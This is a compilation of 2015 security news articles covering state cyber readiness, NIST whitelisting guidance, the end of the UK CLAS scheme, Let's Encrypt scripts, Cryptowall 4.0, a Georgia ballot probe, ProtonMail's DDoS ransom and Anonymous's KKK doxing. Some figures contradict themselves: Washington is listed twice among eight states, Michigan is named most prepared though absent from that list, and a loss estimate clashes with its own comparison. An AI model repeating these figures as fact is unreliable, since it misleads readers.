STE WILLIAMS

Just eight states of 50 fared decently in a Pell study on their preparedness to deal with current and emerging cyberthreats.

Discussions about the cybersecurity readiness of government agencies have typically tended to focus on federal entities rather than on their state counterparts. That may be a big mistake.

A new study by the Pell Center for International Relations and Public Policy at Salve Regina University revealed a troubling lack of preparedness to deal with cybersecurity threats among a vast majority of state governments.

All 50 states are investing in broadband communication and moving forward aggressively on promoting wider use of the Internet to stimulate economic growth and to improve service. But not a single one of them managed to meet all the evaluation criteria that Pell used to measure their cyber readiness, says Francesca Spidalieri, senior fellow for cyber leadership and author of the report.

“The study was really meant to bring awareness to the role that state governments, not just the federal government, play in protecting critical infrastructure and the data than has been entrusted to them by their citizens,” Spidalieri says.

Just like the federal government, state governments, too, hold data on millions of citizens and depend heavily on the Internet and communications technologies to deliver services and to maintain critical infrastructure. But few appear to be considering the potential exposure and costs associated with cyber threats, says Spidalieri.

For the study, Pell looked at measures like whether the state had a strategic cybersecurity plan, formal incident response capabilities, data breach notification, and other cybersecurity laws, threat information-sharing mechanisms, and spending on cybersecurity RD. Pell interviewed state CIOs, chief information security officers, and other state government officials and also reviewed open source data, to arrive at its conclusions.

California, Texas, Maryland, and Washington were among eight states that were identified by the study as being relatively more prepared to deal with current and emerging cyber threats than counterparts. The others are New York, New Jersey, Washington, and Virginia.

Each of these states fared better then others on some of they key measures used to evaluate them. For example, California scored well in areas like incident response, e-crime laws, and cyber RD. But its performance in areas like regular threat assessments and accountability for cyber preparedness remained a work in progress. Pell assessed Texas as being adequate in areas like having a competent cybersecurity authority, doing regular threat assessments, and following the NIST framework, but found it still has work to do in terms of implementing effective cybersecurity laws. Michigan appeared to be the most prepared, based on its meeting most of the measures it was evaluated against.

A vast majority of states though are unprepared, says Francesca. “Most states don’t even mention the need to secure their IT systems or to address cyber threats,” she said. Some acknowledge the problem but appear to have done little to address it.

The common challenges somewhat unsurprisingly related to a lack of funding for cybersecurity programs, lack of executive engagement, the growing sophistication of threats, and a shortage of cybersecurity professionals. “It’s a grim picture and my report meant to shed some light on the states that are leading the way,” she said.

Meanwhile, a second report also released this week served up another reminder of the challenges that federal agencies continue to face on the cybersecurity front. The report by MeriTalk and Palo Alto Networks found that 44 percent of federal endpoints are vulnerable to cyber threats while 30 percent of federal network connected devices have been infected with some type of malware.

As with state governments, barely half of all federal agencies have taken specific steps to secure endpoints while some 20 percent of endpoint security audits do not include all network-connected devices.

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: http://www.darkreading.com/government/states-cybersecurity-readiness-presents--grim-picture--pell-study-finds/d/d-id/1323042?_mc=RSS_DR_EDT

Tags: 60 Sec Security, 60 Second Security, 60 Seconds, 60SS, adblocker, Adobe, Cryptowall, Facebook, fraud, hack, Malware, Melbourne Cup, PageFair, ransomware, selfie

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/pn98eRaWFDY/

Hardening: The US National Institute of Standards and Technology has published a guide to whitelisting that can help organisations deploy one of the most important defensive security technologies.

Application whitelisting is chief among the Australian Signals Directorate’s much-lauded Top 4 Strategies to Mitigate Targeted Cyber Intrusions for its ability to drastically reduce attack surfaces and help identify and block suspicious executables.

Skip spies say when done right application whitelisting is an “incredibly effective” way to ensure defence, stability and consistency, but is often borked in organisations such that it offers only a impression of security.

To that end the technology is not merely a portal through which only approved applications can be installed nor is it just a block on users writing to local drives.

Now the NIST has offered more application whitelisting fodder to complement the ASD controls guide writing in its words NIST’s Guide to Application Whitelisting [pdf] that it hopes to help organisations with the basics of the premise along with implementation support.

The agency’s senior advisor Adam Sedgewick and computer scientist Murugiah Souppaya authored the guide with Scarfone Cybersecurity scribe Karen Scarfone.

“An application whitelist is a list of applications and application components that are authorised to be present or active on a host according to a well-defined baseline,” the trio write.

“If design decisions are incorrect, then the application whitelisting implementation will be more susceptible to compromise and failure.”

The team quickly illustrates five points deploying an effective application whitelist including first evaluating built in operating system capabilities, using sophisticated whitelisting attributes unless strict access controls are in place, and testing deployments in monitoring mode prior to roll out.

Risk assessments should be the first order of business however since application whitelisting is a functionality pain.

“An application whitelisting technology might be considered unsuitable if, for instance, it had to be disabled in order to install security updates for the operating system or particular applications,” the team says.

“A combination of digital signature and publisher and cryptographic hash techniques generally provides the most accurate and comprehensive application whitelisting capability, but usability and maintainability requirements can put significant burdens on the organisation.”

Roll outs should be phased using clear processes that will help minimise pitfalls, NIST adds. ®

Sponsored:
OpenStack for enterprise: The tipping point cometh

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/considering_application_whitelist_tryst_nist_will_help_you_clear_the_mist/

GCHQ’s communications security arm, CESG, has been accused of leaving a gaping hole in the government security advisor profession by axing its accreditation scheme.

The CESG Listed Advisor Scheme (CLAS), the accreditation programme for private sector consultants providing information assurance advice to the public, is to be closed in January next year. It means that some 700 approved advisers will lose their accreditation and customers will have no way of verifying whether security advisers have the necessary government expertise.

The scheme is to be replaced with Certified Cyber Security Consultancy, which accredits companies rather than individuals. However, no companies have yet signed up.

A survey of CLAS customers seen by The Register suggested that the many still valued the scheme.

One government-accredited security advisor who asked not to be named said the new “companies scheme” is at odds with Whitehall’s agenda of working with SMEs, as it squeezes out independent advisers in favour of larger suppliers.

He said: “We seem to be running the risk of losing substantial numbers of potentially key individuals in a Cabinet Office driven information assurance brain drain away from government work.”

The source claimed there had been zero consultation or discussion between CESG and the CLAS practitioner community as to the right balance for future information assurance regimes in the UK public sector.

“Instead of using 700 consultants with, lets assume 10 years experience each in every sector of central and local government, as suppliers and client side, and with many former civil servants of decades standing in their midst, CESG have decided – for reasons surely only they can explain – to drop the scheme wholesale and chase new (as yet poorly defined) models or working.”

Another security advisor said: “The business change has been handled so badly. Even now CESG is still promoting CLAS on its website.” He added: “But soon customers will be in a position where they have no way of knowing if this person knows about government security.”

Another joked: “CESG has some good people, but they are clearly too busy listening to people’s phone conversations to listen to the profession and government customers.”

He added: “Customers are confused and puzzled about why it has been discontinued. When the companies replacement gets off the ground, it’ll only be the big system integrators who benefit.”

A fourth practitioner, who also asked not to be named, acknowledged that the scheme had not been perfect, but said issues around a perceived deterioration of skills could have been addressed without disregarding the whole programme.

A spokeswoman from CESG said it has decided to close CLAS “because both our customers and the CLAS Members’ Forum itself told us it was no longer delivering the consistent, high quality, value for money consultancy needed. The replacement – Certified Cyber Security Consultancy – tackles these issues and is open to independent consultants who can demonstrate that they have the skills needed for the cyber security challenges of today. ®

Sponsored:
OpenStack for enterprise: The tipping point cometh

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/cesg_abandons_advisor_accreditation_scheme_leaves_gap_in_profession/

Hoping to expand the pool of Let’s Encrypt testers, TrueCrypt audit project co-founder Kenneth White has run up a set of scripts to automate the process of installing certificates under the Mozilla-backed open CA.

White, co-director of the Open Crypto Audit Project, has posted the work at Github, here. He explains that the project is quite simple, consisting of Python scripts to “stand up the official Let’s Encrypt certificate management ACME client tool” in the target environments.

These include Debian, Amazon’s Linux (for AWS), CentOS, RedHat and FreeBSD.

White says while he considers Let’s Encrypt to be an important project, at this early stage of development, the official client “can be fragile and error-prone on some systems”.

Having had to batter his own head against the client, White writes, he says he cleaned up the process in his scripts to make Let’s Encrypt more accessible to other users.

He notes that Let’s Encrypt should still be considered in-development, and warns against running either the Let’s Encrypt client or his scripts in production systems:

“LE is still in beta and has some rough edges”, White notes, “including silently invoking sudo and installing quite a few development packages”.

Let’s Encrypt was established at the end of 2014 by Mozilla with the backing of Cisco and the Electronic Frontiers Foundation. Its aim is to give a push to the encrypt-everything movement, by making certificates available to those who can’t afford to buy certificates from commercial CAs.

The group issued its first certificates in July this year, and in October was recognised as a CA by the world’s major browser vendors.

Let’s Encrypt is currently running as an invitational beta. ®

Sponsored:
Data Loss Prevention Data Theft Prevention

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/lets_encrypt_gets_automation/

The fourth iteration of the world’s worst ransomware Cryptowall has surfaced with gnarlier encryption tactics and better evasion tricks that have fooled current antivirus platforms.

Ransomware has ripped through scores of businesses and end-user machines in sporadic and targeted attacks that have cost victims millions of dollars in ransom payments made to criminals who have illegally encrypted valuable files.

The worst offenders remain at large including a single group who may be behind Cryptowall 3.0 and have made some US$325 million this year according to the Cyber Threat Alliance, dwarfing FBI June figures which noted it extorted some US$18 million from US victims alone in about a year.

Andra Zaharia of Denmark-based Heimdal Security says Cryptowall 4.0 is employing “vastly improved” communications and better code, so it can exloit more vulnerabilities.

“Cryptowall 4.0 still includes advanced malware dropper mechanisms to avoid antivirus detection, but this new version possesses vastly improved communication capabilities,” Zaharia says.

“It includes a modified protocol that enables it to avoid being detected, even by second generation enterprise firewall solutions.

“This lowers detection rates significantly compared to the already successful Cryptowall 3.0 attacks.”

For example, the nasty-ware now alters filenames as well as file contents, so it’s harder for victims to work out what’s been encrypted.

Ransom payments in the latest version are badged as a price tag for security software.

Net scum are still communicating with Cryptowall 4.0 over Tor and using hacked web pages to deliver payloads that include botnet componentry to assist further malware delivery.

Actors have tried various tactics to get ransomware on machines and thwart back up efforts.

One of the most unique was a variant that silently encrypted and decrypted databases on the fly in a bid to avoid detection. That meant months of backups would contain encrypted data that could not be decrypted unless a ransom was paid for the respective key.

Another revealed last week threatened user data would be published online if a ransom was not paid. There is no indication the Chimera ransomware lived up to that capability according to analysis.

It follows the death of the Coinvault and Bitcryptor ransomware which Kaspersky confirmed after the arrest of the alleged authors and release of all 14,000 decryption keys. ®

Sponsored:
Data Loss Prevention Data Theft Prevention

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/cryptowall_40/

The US state of Georgia is delving into a claim that a misplaced electronic ballot box may have swung a key vote.

On November 3, in the county of DeKalb just east of Atlanta, LaVista Hills held a vote on whether to become a city. In a closely run race, the motion was defeated by 136 votes – less than one per cent of the electorate.

But Leonard Piazza, who works in the county’s office of voter registration and elections, claims a mislaid memory stick is proof the count was bungled – or, worse, rigged.

On Thursday, he told Channel 2 Action News he found a memory card of the type used by the state’s voting machines loose in the office, and fears votes stored on the device were not counted.

Citizens in the state use Diebold computers to vote in elections and referendums, their votes being electronically stored and counted.

Piazza claims that when he told his superior about the misplaced memory stick, and the possibility of uncounted votes, she refused to investigate it, and placed him on administrative leave.

On the orders of Georgia Secretary of State Brian Kemp, a formal investigation is now underway into Piazza’s claims: officials have confiscating the memory stick and one of DeKalb County’s voting machines used in the LaVista Hills ballot.

“As Secretary of State I take any allegations of elections fraud seriously,” said Kemp.

“Given the serious nature of these allegations, I have asked the Center for Election Systems at Kennesaw State University and the GBI [George Bureau of Investigation] to assist in this investigation. I asked the GBI to assist due to the alleged theft of secured memory cards and fraud allegations. Once completed, the investigation will be presented to the state elections Board. We will have no further comment until that time.”

Meanwhile, Piazza himself has come under scrutiny. He previously worked for an election board in Pennsylvania before being let go. He sued his former employer over claims that he was removed from his job because he wanted to expose corruption in the voting system.

Piazza’s boss Maxine Daniels says the whole thing is a case of a disgruntled employee making waves, and insists the vote was fair. ®

Sponsored:
2015 Cost of Cyber Crime Study: United States

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/06/georgia_voter_fraud_investigation/

Cybersecurity doesn’t have to be an arms race towards complexity if we put people front and center of the solution.

Every winter there is an outbreak of flu. The virus evolves rapidly and mutates. Annually the flu causes three to five million cases of severe illness and the death toll can reach half a million people. Serious pandemics like the Asian Flu, Hong Kong Flu, and Spanish Flu each claimed more than a million lives. In 2009, the Swine Flu pandemic outbreak began in Veracruz, Mexico. Swine Flu infected an estimated 10 million to 200 million people. But the outbreak was controlled and the fatality rate of 18,500 (0.03%) was far less than experts feared at first.

Despite the dramatic toll that influenza takes, it has been well controlled by a few basic best practices. Good health and hygiene practices including frequent hand washing, covering coughs and sneezes, and avoiding close contact with sick people to reduce the transmission of the flu virus. According to the Centers for Disease Control, hand washing is the single most important thing we can do to keep from getting sick and spreading illness to others. Vaccination has also helped reduce the risk of getting the flu by up to 90%.

While cybersecurity breaches don’t kill people, the costs can be very high. But unlike public health emergencies, breach responses tend to be isolated, uncoordinated, and unfortunately not very effective; our industry regularly overlooks effective, common-sense approaches and fundamental preventative security controls. For example, the U.S. Inspector General’s Office warned the Office of Personnel Management the year before its massive breach to implement elementary preventive measures. The OPM failed to heed those warnings and got hacked.

Promoting best security practices is a lot like promoting healthy hygiene. The more people we can recruit to adopt basic, effective security practices, the safer we will all be. There’s no reason we can’t combat malware as effectively as we respond to biological viruses.

We have to change our ways.

The estimated annual cost of influenza in the U.S. ranges up to $87 billion, according to the National Institutes of Health. Cybercriminals last year stole six times more from the global economy than the U.S. spent fighting the flu. McAfee estimates annual global losses to cybercrime approached half a billion dollars in 2014 (0.69% of U.S. GDP) with more than 200,000 jobs lost in the United States. In the battle against cybercrime, we continue to fall behind.

Our fundamental challenge is asymmetry. As every hacker knows, any system or company is only as secure as its weakest link. Organizations need to protect every device, server, application, system, credential, and user. But a hacker only needs to steal just one user ID and password to get in. The way to improve cybersecurity is to take this traditional weakness and turn it against the enemy by drafting users into the solution. Instead of being a point of vulnerability, users become our front line defense by focusing on the fundamentals of good security hygiene — the digital equivalent of washing your hands or covering your mouth when you cough. If we all incorporated these four simple practices into our daily lives, we’d shut down most cyberattacks:

• Update the devices and software you use frequently. Vendors constantly patch bugs in their products. If you don’t have a policy to run the latest versions of software releases on your servers, laptops, and smartphones, you’re leaving known vulnerabilities open to hackers.
• The most popular password in the world remains 123456. Stop trying to memorize lengthy passwords. Use a password manager like LastPass that automates the generation of complex passwords.
• Use two-factor authentication. A hacker may steal your passwords, but it’s nearly impossible to steal those and your smartphone or token at the same time.
• Use common sense with your email. Never open email attachments or click on links from a sender you don’t know and trust

Share these suggestions with your work colleagues, friends, and family. Cybersecurity doesn’t have to be an arms race towards complexity. Like fighting the spread of a deadly flu, it’s much better if we put people front and center as part of the solution.

Prior to co-founding Duo Security where he serves as CEO, Dug Song spent seven years as founding chief security architect at Arbor Networks, developers of network software that protects 80 percent of the world’s Internet service providers. Before Arbor, Song built the first … View Full Bio

Article source: http://www.darkreading.com/endpoint/what-flu-season-can-teach-us-about-fighting-cyberattacks/a/d-id/1323038?_mc=RSS_DR_EDT

Swiss-based encrypted email provider ProtonMail – developed at the CERN research facility in 2013 to withstand surveillance by the world’s increasingly inquisitive intelligence agencies – has revealed that it handed over 15 bitcoins (about $6000/£4000) to stop a Distributed Denial of Service (DDoS) attack.

With the company’s main site still down, ProtonMail took to WordPress to explain the situation, saying:

Slightly before midnight on November 3rd, 2015, we received a blackmail email from a group of criminals who have been responsible for a string of DDOS attacks which have happened across Switzerland in the past few weeks.

Shortly afterward, the company explained, it came under a DDoS attack which took it offline for around 15 minutes.

On 4 November, a further attack was initiated at approximately 11:00. Despite the best efforts of its datacenter and upstream provider, ProtonMail toppled over in the face of what it calls “an unprecedented level of sophistication”, as a coordinated attack exceeded 100 Gbps.

As the scope of the attack increased, it wasn’t just the company’s datacenter that was knocked out but also the ISP it used, thereby impacting hundreds of other firms.

It was this collateral damage, the company said, that led to it coughing up the Bitcoin:

At this point, we were placed under a lot of pressure by third parties to just pay the ransom, which we grudgingly agreed to do at 3:30PM Geneva time.

At this point you may assume that the story is over – after all, many gangs behind online ransom crime do indeed unlock files or cease attacks when the cash is handed over – because good “customer service” ensures the next victim pays too.

But in this case, the DDoS attack was not called off. Indeed, at the time of writing, protonmail.com is still inaccessible.

Taking to Twitter, the company reiterated why it gave in to blackmail, saying:

Over 100 companies were taken offline from the attack against us. Impacted companies asked us to pay, we couldn’t refuse.

Responding to questions on the social network, ProtonMail confirmed that many of the companies who had asked it to pay up had contributed to a defence fund (its already raised $14,000 of its $50,000 target) set up to help it improve its infrastructure in a bid to thwart future attacks.

In slightly better news, customers of the service, which has around half a million users, can breathe easy, safe in the knowledge that their “data is safe and untouched.”

As the criminal investigation continues, ProtonMail says it is working with the Swiss Governmental Computer Emergency Response Team (GovCERT) and the Cybercrime Coordination Unit Switzerland (CYCO), with added assistance from Europol.

Follow @Security_FAQs

Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/fD6HeV6mHKU/

Members of the loose hacker collective Anonymous followed through on a pledge to release the names of members of the Ku Klux Klan, but #OpKKK was flawed from the get-go by uncoordinated document dumps and smearing of innocent people who are in no way connected to the KKK.

The plan for the op was to “unhood” 1000 members of the notorious hate group KKK and spur dialogue on racism.

On Thursday, 5 November, celebrated by Anonymous as Guy Fawkes Day, members of the group exposed hundreds of names of alleged KKK members, publishing links to their social media accounts on Pastebin.

A Twitter account, @Operation_KKK, publicized the link to documents, and had been actively promoting the op for several days prior.

Anonymous said it used “human intelligence” to identify KKK members, and many of the social media accounts show racist imagery and messages.

Soon after the document dump, however, the group was forced to remove some of the names, admitting that the list was not completely accurate.

We removed several names from our list for further investigation. We would rather have a smaller, accurate list that we are comfortable with

One person included in the dump was Ben Garrison, a cartoonist for the Washington Post whose name has been erroneously associated with racist memes using some of his cartoons.

Garrison told the Post that he is no way a white supremacist, but that anti-semitic memes using his cartoons have “ruin[ed] my online reputation as well as my commercial art business.”

A similar document dump under the flag of Anonymous’s OpKKK was released on Monday by a Twitter user calling himself “Amped Attacks”, but that list of names included several prominent US Senators and mayors who denied any involvement with the KKK.

The @Operation_KKK account disavowed any affiliation and said the group does not “recklessly involve innocent individuals.”

This account has NOT YET released any information. We believe in due diligence and will NOT recklessly involve innocent individuals #OpKKK

The Guy Fawkes Day “doxing” of alleged KKK members continues Anonymous’s online war against the KKK that goes back at least as far as November 2014.

Back then, in the aftermath of months of protests in Ferguson, Missouri over the shooting of an unarmed black teenager by a white police officer, members of the KKK promised to use “lethal force” against protesters.

Anonymous responded by hacking a KKK Twitter account and promised to expose KKK members.

Anonymous members took up the mantle of anti-racism in support of the Ferguson protesters immediately after the shooting of Michael Brown.

The group said it would expose the officer involved in the shooting before his name was officially released, but an Anonymous-affiliated Twitter account identified the wrong Ferguson officer, who went into hiding after receiving death threats.

With so many innocent people erroneously exposed to physical danger and reputation-damaging slander in these incidents, it seems like Anonymous’s message could be drowned out by blowback about its tactics.

Those tactics are not just potentially harmful – they are also illegal.

As Naked Security writer Lisa Vaas pointed out last year, hacktivism isn’t likely to solve societal problems like racism:

Illegal posting of others’ personal information isn’t the way to solve the enormous problems of racism, no matter how satisfying it is to knock a group like the KKK down to the ground.

Follow @NakedSecurity
Follow @JohnZorabedian

Image of hacker with Guy Fawkes mask courtesy of Shutterstock.com.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/82G9quabeYY/